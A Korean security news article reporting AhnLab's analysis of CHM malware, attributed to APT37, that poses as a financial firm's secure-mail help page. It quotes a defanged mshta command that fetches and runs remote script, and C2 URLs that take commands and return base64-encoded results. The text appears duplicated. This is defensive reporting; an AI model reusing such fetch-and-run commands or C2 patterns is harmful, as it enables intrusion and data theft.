금융 기업 ‘도움말’과 유사한 창 생성...CHM 내부 악성 스크립트 동작
[보안뉴스 김영명 기자] 북한 해커조직으로 추정되는 레드아이즈(APT37, ScarCruft)가 제작한 것으로 보이는 CHM 악성코드가 국내 금융기업을 타깃으로 유포되고 있는 정황이 포착됐다.
[이미지=utoimage]
안랩 ASEC 분석팀에 따르면, CHM 파일을 실행하면 국내 금융기업의 보안 메일을 사칭한 도움말 창을 생성한다. 이때 CHM 내부에 존재하는 악성 스크립트가 동작하는데, 사용자는 해당 과정을 알아차리기 힘들다. 이러한 특징을 이용해 최근 CHM을 이용한 악성코드 유포가 증가하고 있다.
실행되는 악성 스크립트는 과거 알려진 CHM 악성코드들과 동일하게 바로가기 객체(ShortCut)를 이용했다. 바로가기 객체는 Click 메서드를 통해 호출되며 Item1 항목에 존재하는 명령어가 실행된다. 해당 파일에서는 mshta 프로세스를 통해 특정 url에 존재하는 추가 스크립트를 실행하게 된다. 이때 실행 명령어는 ‘mshta.exe hxxp://shacc[.]kr/skin/product/1.html’와 같다.
▲보안 메일을 사칭한 도움말 및 CHM 내 악성 스크립트[자료=안랩 ASEC 분석팀]
mshta 프로세스를 통해 실행되는 ‘1.html’ 파일에는 자바스크립트 코드가 포함돼 있으며, 해당 코드는 인코딩된 파워쉘 명령어를 실행하는 기능을 수행한다. 이때 실행되는 파워쉘 명령어는 앞서 언급한 M2RAT 악성코드 공격 과정에서 사용된 명령어와 유사한 형태다.
▲1.html 파일 코드(위) 및 프로세스 트리(아래)[자료=안랩 ASEC 분석팀]
디코딩된 파워쉘 명령어를 확인한 결과 C2(명령제어 서버) 주소, 명령 실행 결과를 저장하는 파일명, 레지스트리 값 이름 외에는 2월에 사용된 명령어와 코드가 모두 동일했다. 해당 명령어는 지속성을 위한 RUN 키 등록, 공격자 서버로부터 명령어 수신, 명령 실행 결과 전달의 기능을 수행한다.
C2 서버 정보는 ‘hxxp://shacc[.]kr/skin/product/mid.php?U=[컴퓨터이름]+[유저이름]’은 공격자 명령을 수신하고, ‘hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64 인코딩]’은 명령 실행 결과를 전달하게 된다.
▲디코딩된 파워쉘 명령어[자료=안랩 ASEC 분석팀]
해당 유형의 악성코드에 감염될 경우 공격자의 명령에 따라 파일 다운로드 및 정보 탈취 등 다양한 악성 행위를 수행할 수 있게 되며 큰 피해를 입을 수 있다. 특히, 국내 특정 사용자를 대상으로 유포하는 악성코드는 유포 대상에 따라 관심 있는 주제의 내용을 포함해 사용자의 실행을 유도하고 있다. 따라서, 출처가 불분명한 메일의 열람을 자제하고 첨부된 파일은 실행하지 않도록 해야 한다. 또한, 주기적으로 PC 검사를 진행하고 보안 제품을 최신 엔진으로 업데이트해야 한다.
[김영명 기자(boan@boannews.com)]
[보안뉴스 김영명 기자] 북한 해커조직으로 추정되는 레드아이즈(APT37, ScarCruft)가 제작한 것으로 보이는 CHM 악성코드가 국내 금융기업을 타깃으로 유포되고 있는 정황이 포착됐다.
[이미지=utoimage]
안랩 ASEC 분석팀에 따르면, CHM 파일을 실행하면 국내 금융기업의 보안 메일을 사칭한 도움말 창을 생성한다. 이때 CHM 내부에 존재하는 악성 스크립트가 동작하는데, 사용자는 해당 과정을 알아차리기 힘들다. 이러한 특징을 이용해 최근 CHM을 이용한 악성코드 유포가 증가하고 있다.
실행되는 악성 스크립트는 과거 알려진 CHM 악성코드들과 동일하게 바로가기 객체(ShortCut)를 이용했다. 바로가기 객체는 Click 메서드를 통해 호출되며 Item1 항목에 존재하는 명령어가 실행된다. 해당 파일에서는 mshta 프로세스를 통해 특정 url에 존재하는 추가 스크립트를 실행하게 된다. 이때 실행 명령어는 ‘mshta.exe hxxp://shacc[.]kr/skin/product/1.html’와 같다.
▲보안 메일을 사칭한 도움말 및 CHM 내 악성 스크립트[자료=안랩 ASEC 분석팀]
mshta 프로세스를 통해 실행되는 ‘1.html’ 파일에는 자바스크립트 코드가 포함돼 있으며, 해당 코드는 인코딩된 파워쉘 명령어를 실행하는 기능을 수행한다. 이때 실행되는 파워쉘 명령어는 앞서 언급한 M2RAT 악성코드 공격 과정에서 사용된 명령어와 유사한 형태다.
▲1.html 파일 코드(위) 및 프로세스 트리(아래)[자료=안랩 ASEC 분석팀]
디코딩된 파워쉘 명령어를 확인한 결과 C2(명령제어 서버) 주소, 명령 실행 결과를 저장하는 파일명, 레지스트리 값 이름 외에는 2월에 사용된 명령어와 코드가 모두 동일했다. 해당 명령어는 지속성을 위한 RUN 키 등록, 공격자 서버로부터 명령어 수신, 명령 실행 결과 전달의 기능을 수행한다.
C2 서버 정보는 ‘hxxp://shacc[.]kr/skin/product/mid.php?U=[컴퓨터이름]+[유저이름]’은 공격자 명령을 수신하고, ‘hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64 인코딩]’은 명령 실행 결과를 전달하게 된다.
▲디코딩된 파워쉘 명령어[자료=안랩 ASEC 분석팀]
해당 유형의 악성코드에 감염될 경우 공격자의 명령에 따라 파일 다운로드 및 정보 탈취 등 다양한 악성 행위를 수행할 수 있게 되며 큰 피해를 입을 수 있다. 특히, 국내 특정 사용자를 대상으로 유포하는 악성코드는 유포 대상에 따라 관심 있는 주제의 내용을 포함해 사용자의 실행을 유도하고 있다. 따라서, 출처가 불분명한 메일의 열람을 자제하고 첨부된 파일은 실행하지 않도록 해야 한다. 또한, 주기적으로 PC 검사를 진행하고 보안 제품을 최신 엔진으로 업데이트해야 한다.
[김영명 기자(boan@boannews.com)]
<저작권자: 보안뉴스(www.boannews.com) 무단전재-재배포금지>
.jpg)
.png)
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.JPG){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
